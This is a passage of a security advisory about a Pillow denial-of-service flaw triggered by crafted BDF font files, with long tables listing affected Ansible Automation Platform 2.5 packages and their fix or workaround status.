| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch | — |
A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by providing a specially crafted BDF font file. The library's image processing function fails to properly validate dimensions from the font file, bypassing a critical security check designed to prevent excessive memory usage. This oversight can lead to the system consuming an unreasonable amount of memory, making it unavailable to legitimate users.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x | — |
